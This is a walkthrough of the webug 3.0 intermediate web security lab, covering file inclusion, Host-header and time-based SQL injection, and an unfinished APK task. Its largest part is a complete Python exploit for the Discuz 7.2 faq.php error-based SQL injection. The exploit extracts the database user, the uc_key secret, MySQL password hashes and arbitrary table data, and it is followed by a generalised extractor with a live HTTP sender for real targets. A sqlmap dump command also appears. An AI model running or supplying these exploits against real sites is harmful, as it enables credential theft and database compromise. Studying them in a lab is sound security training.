webug 3.0 lab (intermediate level)
Challenge 1: Give me something
Type: file inclusion
Tool: manual
1. The challenge description suggests this one tests a file inclusion vulnerability. Clicking "Go" on the page did nothing; the source showed the code itself was broken, so it was changed as follows to get the page working again.

```php
<?php
if( $_GET )
{
$file=$_GET['country'];
require_once "$file";
}
?>
```

Changed to:

```php
<?php
if( $_GET )
{
$file=$_GET['country'];
require_once "\\cc\\"."$file";
}
?>
```

The page after the change:
2. The challenge description gives the path hint **../../etc/passwd**, but the VM runs Windows, so that path cannot exist. The challenge was presumably never finished, so include something else instead, for example an image file.
Challenge 2: pass
Type: file inclusion
Tool: manual
1. The same file inclusion vulnerability as the previous challenge, except that this time the parameter is submitted via POST.
2. Use a proxy and modify the submitted parameter.
3. In both challenges the source was available, so the relative path was easy to work out; in practice the path can be brute-forced with automated tools.
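To make the point of challenges 1 and 2 concrete: the patched `require_once "\\cc\\"."$file"` only prepends a directory to the raw parameter, which is why the page can still be made to include arbitrary files. The Python below is an added model of that include (not code from the page or from webug), using `ntpath` so it reproduces Windows path normalisation even when run on Linux, beside the allowlist and containment check a real fix needs. The webroot path and the file names in the allowlist are assumptions.

```python
import ntpath

# Assumed lab layout (hypothetical): the directory the patched
# require_once "\\cc\\".$file points at, modelled as an absolute Windows path.
WEBROOT = r"C:\phpStudy\WWW\pentest\test"
INCLUDE_DIR = ntpath.join(WEBROOT, "cc")
# Assumed allowlist of the only files the page should ever include (hypothetical names).
ALLOWED = ("cn.php", "us.php", "uk.php")


def naive_include_path(country):
    """Model of the page's patched include: fixed prefix + raw input, then the
    normalisation Windows applies on open. Prepending a directory does nothing
    to stop '..' segments from walking back out of it."""
    return ntpath.normpath(INCLUDE_DIR + "\\" + country)


def is_inside(path, base):
    """True only if the normalised, case-folded path stays under base."""
    path = ntpath.normcase(ntpath.normpath(path))
    base = ntpath.normcase(ntpath.normpath(base))
    try:
        return ntpath.commonpath([path, base]) == base
    except ValueError:        # different drives, or absolute vs relative
        return False


def safe_include_path(country):
    """Hardened version: exact-match allowlist first, containment check second.
    Returns the path to include, or None to refuse the request."""
    if country not in ALLOWED:
        return None
    candidate = ntpath.join(INCLUDE_DIR, country)
    return candidate if is_inside(candidate, INCLUDE_DIR) else None


if __name__ == "__main__":
    for c in ("cn.php", r"..\..\..\..\..\Windows\win.ini"):
        print("%-35s naive: %-45s safe: %s" % (c, naive_include_path(c), safe_include_path(c)))
```

Five `..` segments are enough to climb from the assumed include directory to the drive root, so `country=..\..\..\..\..\Windows\win.ini` reaches `C:\Windows\win.ini` in the naive model while the hardened version refuses it.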
Challenge 3: Why the hell is it injection again
Type: injection
Tool: Modify Headers
1. The challenge says plainly that this is another injection problem, so the key is to find the injection point. There is no input field on the page, no parameter in the URL, and the cookie is empty, so it is probably a header injection.
2. I tried the X-Forwarded-For header used in the basics section and saw nothing unusual. Rather than keep guessing, I read the source: the injection is in the Host header, and the process is the same as the header injection in the pentest basics section. The Modify Headers settings and the result are shown below:
Challenge 4: Take a look at the APK
Type: reverse engineering
Tool: apktool
Don't know how.
Challenge 5: Time-based injection
Type: injection
Tool: SQLMAP
1. First craft a time-based blind payload to test whether the injection is time-based: when the guessed length is 12 there is a clear delay, so a blind injection exists.
2. The challenge states that the injection is time-based blind. Manual blind extraction is tedious and takes many requests, so use a tool directly. Run the following in a terminal:
sqlmap -u "192.168.6.128/pentest/test/time/index.php?type=" -p type -D pentesterlab -T flag --dump
3. The result:
4. After reading the source, time-based injection turns out to be unnecessary; the following payload works instead:
Challenge 6: Injection
Type: error-based injection
Tool: Python
The script used, written for Discuz 7.2's faq.php according to its own description, is as follows:
```python
#!/usr/bin/env python3
# coding: utf-8
# Error-based SQL injection script for the Discuz 7.2 faq.php grouppermission
# bug. Every payload uses the duplicate-key trick
#     select count(*), concat(<value>, floor(rand(0)*2)) x ... group by x
# which makes MySQL fail with "Duplicate entry '<value>0|1' for key ..." and
# echo the value back inside the error message.
import re
import sys
import argparse

import requests
from prettytable import PrettyTable

CU = False
CD = False
UK = False
PW = False
SC = False
TB = False
CL = False
DP = False
DB = None     # database id, from -D id:name
DBN = None    # database name
TBL = None    # table id, from -T id:name
TBLN = None   # table name
COL = None    # comma-separated column list, from -C
URL = None    # target site root, from -U

UA = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201'
DUP = r"Duplicate entry '(.*?)'"               # value followed by the rand() digit
DUP_DELIM = r"Duplicate entry '\^(.*?)\^\d'"   # value wrapped in ^ (0x5e) delimiters


def parse_argvs():
    global CU, CD, UK, PW, SC, TB, CL, DP, DB, DBN, TBL, TBLN, COL, URL
    parser = argparse.ArgumentParser(description='Designed for DZ7.2')
    parser.add_argument('--current-user', help='Retrieve DBMS current user', action='store_true')
    parser.add_argument('--current-db', help='Retrieve DBMS current database', action='store_true')
    parser.add_argument('--uc-key', help='Retrieve uc-key', action='store_true')
    parser.add_argument('--password', help='Enumerate DBMS users password hashes', action='store_true')
    parser.add_argument('--schemas', help='Enumerate DBMS database schemas', action='store_true')
    parser.add_argument('--tables', help='Enumerate DBMS database tables', action='store_true')
    parser.add_argument('--columns', help='Enumerate DBMS database table columns', action='store_true')
    parser.add_argument('--dump', help='Dump DBMS database table entries', action='store_true')
    parser.add_argument('-D', help='DBMS database to enumerate', action='store', metavar='id:database')
    parser.add_argument('-T', help='DBMS database table to enumerate', action='store', metavar='id:table_name')
    parser.add_argument('-C', help='DBMS database table column(s) to dump', action='store', metavar='col1,col2')
    parser.add_argument('-U', help='Target site root (faq.php is appended)', action='store', metavar='URL', required=True)
    args = parser.parse_args(sys.argv[1:])
    CU = args.current_user
    CD = args.current_db
    UK = args.uc_key
    PW = args.password
    SC = args.schemas
    TB = args.tables
    CL = args.columns
    DP = args.dump
    if args.D:
        DB, DBN = args.D.split(':')
    if args.T:
        TBL, TBLN = args.T.split(':')
    COL = args.C
    URL = args.U.rstrip('/')


def injected(payload):
    """faq.php grouppermission parameters: gids[99] breaks out of the quoting,
    gids[100][0] carries the payload."""
    return {'action': 'grouppermission', 'gids[99]': "'", 'gids[100][0]': payload}


def sendRequest(para):
    """POST the parameters to faq.php and return the response body."""
    try:
        res = requests.post(URL + '/faq.php', data=para,
                            headers={'User-Agent': UA}, timeout=15)
    except requests.RequestException:
        print('Can not connect to target!')
        sys.exit(0)
    return res.text


def GetCurrentUser():
    print('Start getting current user')
    res = sendRequest(injected(") and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#"))
    cu = re.findall(DUP, res)
    if len(cu) == 0:
        print('Exploit Failed!')
        return
    print('Current User:%s' % cu[0][:-1])        # [:-1] drops the trailing rand() digit


def GetCurrentDB():
    print('Start getting current database')
    res = sendRequest(injected(") and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#"))
    database = re.findall(DUP, res)
    if len(database) == 0:
        print('Exploit Failed!')
        return
    print('Current Database:%s' % database[0][:-1])


def GetUcKey():
    print('Start getting uc_key')
    # The key echoed in the Duplicate entry error is cut off at 64 characters,
    # so the 64-character authkey is fetched as 62 + 2 characters.
    para = injected(") and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#")
    para1 = injected(") and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#")
    res = sendRequest(para)
    res1 = sendRequest(para1)
    key1 = re.findall(DUP, res)
    key2 = re.findall(DUP, res1)
    if len(key1) == 0 or len(key2) == 0:
        print('Get Uc_Key Failed!')
        return
    key = key1[0][:-1] + key2[0][:-1]
    print('uc_key:%s' % key)


def GetUserPW():
    print('Start getting user password hashes')
    count = 0
    paras = ") and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#"
    while True:
        res = sendRequest(injected(paras % count))
        user_list = re.findall(DUP, res)
        if len(user_list) == 0:
            print('Dump Done!')
            break
        # "user password<digit>": drop the digit, then split on the 0x20 separator
        user = user_list[0][:-1].split(' ', 1)
        print('User info: user:%s password:%s' % (user[0], user[1] if len(user) > 1 else ''))
        count += 1


def DumpSchema():
    print('Start dumping schemas')
    count = 0
    paras = ") and (select 1 from (select count(*),concat(0x5e,(select schema_name from INFORMATION_SCHEMA.SCHEMATA limit %d,1),0x5e,floor(rand(0)*2))x from information_schema.tables group by x)a)#"
    table = PrettyTable(['id', 'schema_name'])
    while True:
        res = sendRequest(injected(paras % count))
        tn = re.findall(DUP_DELIM, res)
        if len(tn) == 0:
            print('Dump Done!')
            break
        table.add_row([count, tn[0]])
        count += 1
    print(table)


def DumpTableNames():
    print('Start dumping table names')
    count = 0
    # The tail of this payload was cut off in the source; it is completed here to
    # match the other payloads (table names come back hex-encoded and ^-delimited).
    paras = (") and (select 1 from (select count(*),concat(0x5e,(select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=(select schema_name from INFORMATION_SCHEMA.SCHEMATA limit %s,1) limit %%d,1),0x5e,floor(rand(0)*2))x from information_schema.tables group by x)a)#" % DB)
    table = PrettyTable(['id', 'table_name'])
    while True:
        res = sendRequest(injected(paras % count))
        tn = re.findall(DUP_DELIM, res)
        if len(tn) == 0:
            print('Dump Done!')
            break
        table_name = bytes.fromhex(tn[0]).decode('utf-8', 'replace')
        table.add_row([count, table_name])
        count += 1
    print(table)


def DumpTableColumns():
    print('Start dumping columns')
    count = 0
    # Tail cut off in the source as well; completed to match the other payloads.
    paras = (") and (select 1 from (select count(*),concat(0x5e,(select column_name from INFORMATION_SCHEMA.COLUMNS where table_name=(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where table_schema=(select schema_name from INFORMATION_SCHEMA.SCHEMATA limit %s,1) limit %s,1) limit %%d,1),0x5e,floor(rand(0)*2))x from information_schema.tables group by x)a)#" % (DB, TBL))
    table = PrettyTable(['column_name'])
    while True:
        res = sendRequest(injected(paras % count))
        pre = re.findall(DUP_DELIM, res)
        if len(pre) == 0:
            print('Dump Done!')
            break
        table.add_row([pre[0]])
        count += 1
    print(table)


def DumpData():
    print('Start dumping data')
    count = 0
    table = PrettyTable(COL.split(','))
    columns = COL.replace(',', ',0x20,')     # columns come back space-separated
    paras = (") and (select 1 from (select count(*),concat((select concat(%s) from %s" % (columns, DBN + '.' + TBLN)
             + " limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#")
    while True:
        res = sendRequest(injected(paras % count))
        datas = re.findall(DUP, res)
        if len(datas) == 0:
            print('Dump Done!')
            break
        cleandata = datas[0][:-1]
        # values containing spaces would break this split; the row is then skipped
        info = cleandata.split(' ')
        if len(info) == len(table.field_names):
            table.add_row(info)
        else:
            print('Unparsable row: %s' % cleandata)
        count += 1
    print(table)


if __name__ == '__main__':
    parse_argvs()
    if CU:
        GetCurrentUser()
    if CD:
        GetCurrentDB()
    if UK:
        GetUcKey()
    if PW:
        GetUserPW()
    if SC:
        DumpSchema()
    if TB:
        if DB:
            DumpTableNames()
        else:
            print("Please specify database id and name")
    if CL:
        if DB:
            if TBL:
                DumpTableColumns()
            else:
                print("Please specify table id and name")
        else:
            print("Please specify database id and name")
    if DP:
        if DBN:
            if TBLN:
                if COL:
                    DumpData()
                else:
                    print("Please specify columns")
            else:
                print("Please specify table id and name")
        else:
            print("Please specify database id and name")
```
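The script above reads every value straight out of MySQL's "Duplicate entry" message and strips the trailing rand() digit with `[:-1]`; GetUcKey has to fetch authkey as `substr(...,1,62)` plus `substr(...,63,2)` because the key reported in that error is cut off at 64 characters, and only some of the functions use the `0x5e` (`^`) delimiters that make the digit unambiguous. As an added example, not part of the page's script, the Python below generalises that: it wraps any expression in the same `floor(rand(0)*2)` payload with `^` delimiters and walks arbitrarily long values out in windows that fit under the 64-character limit. The sender is the same faq.php POST the script makes; the run below uses a constructed fake target (canned values, same truncation) so it works offline.

```python
import re

KEY_MAX = 64           # MySQL truncates the key echoed in "Duplicate entry '...'" at 64 characters
WINDOW = KEY_MAX - 3   # room left once the two ^ delimiters and the rand() digit are added
DUP = re.compile(r"Duplicate entry '\^(.*?)\^\d'")


def wrap(expr, offset, width):
    """The page's duplicate-key payload around a substr() window of `expr`;
    goes into gids[100][0] exactly like the payloads in the script above."""
    return (") and (select 1 from (select count(*),concat(0x5e,substr((%s),%d,%d),0x5e,"
            "floor(rand(0)*2))x from information_schema.tables group by x)a)#"
            % (expr, offset, width))


def faq_params(payload):
    """faq.php grouppermission parameters, as in the script above."""
    return {'action': 'grouppermission', 'gids[99]': "'", 'gids[100][0]': payload}


def extract(send, expr, width=WINDOW):
    """send(payload) -> response body. Returns the full value of `expr`, however
    long, or '' if the error never fires (no injection, or an empty value)."""
    out, offset = "", 1
    while True:
        m = DUP.search(send(wrap(expr, offset, width)))
        if not m:
            break
        out += m.group(1)
        if len(m.group(1)) < width:   # short window: reached the end of the value
            break
        offset += width
    return out


def http_sender(url):
    """Real sender: the same POST to /faq.php the script above makes
    (requests is imported lazily so the module runs offline)."""
    import requests

    def send(payload):
        return requests.post(url + '/faq.php', data=faq_params(payload), timeout=15).text
    return send


def fake_target(values):
    """Constructed stand-in for a vulnerable faq.php: resolves the injected
    expression from a dict of canned results and reproduces MySQL's 64-character
    key truncation in the error message."""
    pat = re.compile(r"concat\(0x5e,substr\(\((.*)\),(\d+),(\d+)\),0x5e")

    def send(payload):
        m = pat.search(payload)
        if not m or m.group(1) not in values:
            return "<html>ok</html>"               # query ran cleanly: nothing leaks
        expr, off, w = m.group(1), int(m.group(2)), int(m.group(3))
        key = ("^%s^1" % values[expr][off - 1:off - 1 + w])[:KEY_MAX]
        return "MySQL Query Error: Duplicate entry '%s' for key 'group_key'" % key
    return send


if __name__ == "__main__":
    # constructed 100-character value standing in for a uc_key-sized secret
    expr = "select authkey from cdb_uc_applications limit 0,1"
    value = ("0123456789abcdef" * 7)[:100]
    print(extract(fake_target({expr: value}), expr))
```

Against a live target the call is `extract(http_sender("http://host/discuz"), "select authkey from cdb_uc_applications limit 0,1")`; a 100-character value costs two requests, and a value whose length is an exact multiple of the window costs one extra request that returns an empty window.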
Challenge 7: ASPCMS
Type: SQL injection
Tool: OWASP Mantra
1. This challenge requires setting up the environment yourself: first configure the IIS server on the VM (see the referenced article for the details).
2. Once IIS is configured, copy everything under C:\phpStudy\WWW\pentest\cms\aspcms\AspCms2.0.1GB2312 into the IIS web root.
3. Note that phpStudy already occupies port 80, so IIS has to be bound to a different port; I used 8081, as shown:
